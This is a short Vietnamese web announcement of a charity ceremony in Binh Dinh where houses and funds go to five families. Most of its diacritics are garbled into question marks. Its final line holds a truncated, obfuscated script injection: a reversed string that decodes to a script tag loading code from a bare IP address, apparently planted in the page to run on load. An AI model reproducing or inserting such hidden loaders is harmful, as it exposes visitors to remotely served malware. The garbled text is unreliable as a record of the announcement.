Thư mời tham gia lễ trao quỹ từ thiện và trao tặng nhà tại Bình Định


8 gi? sáng mai, L? trao nhà NHÂN ÁI cho 5 h? gia ?ình t?i Bình ??nh s? ???c t? ch?c t?i Nhà V?n Hóa Lao ??ng t?nh Bình ??nh. Ngoài s? có m?t ??i di?n CADI-SUN, H?i Ch? Th?p ?? t?nh Bình ??nh, các c? quan ban ngành…, các khán gi? s? có d?p giao l?u v?i ??i s? Nhân Ái – Hoa h?u Di?m H??ng và th??ng th?c các ch??ng trình v?n ngh? ??c s?c.

 

1376425_176128452573212_1932302276_n 611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))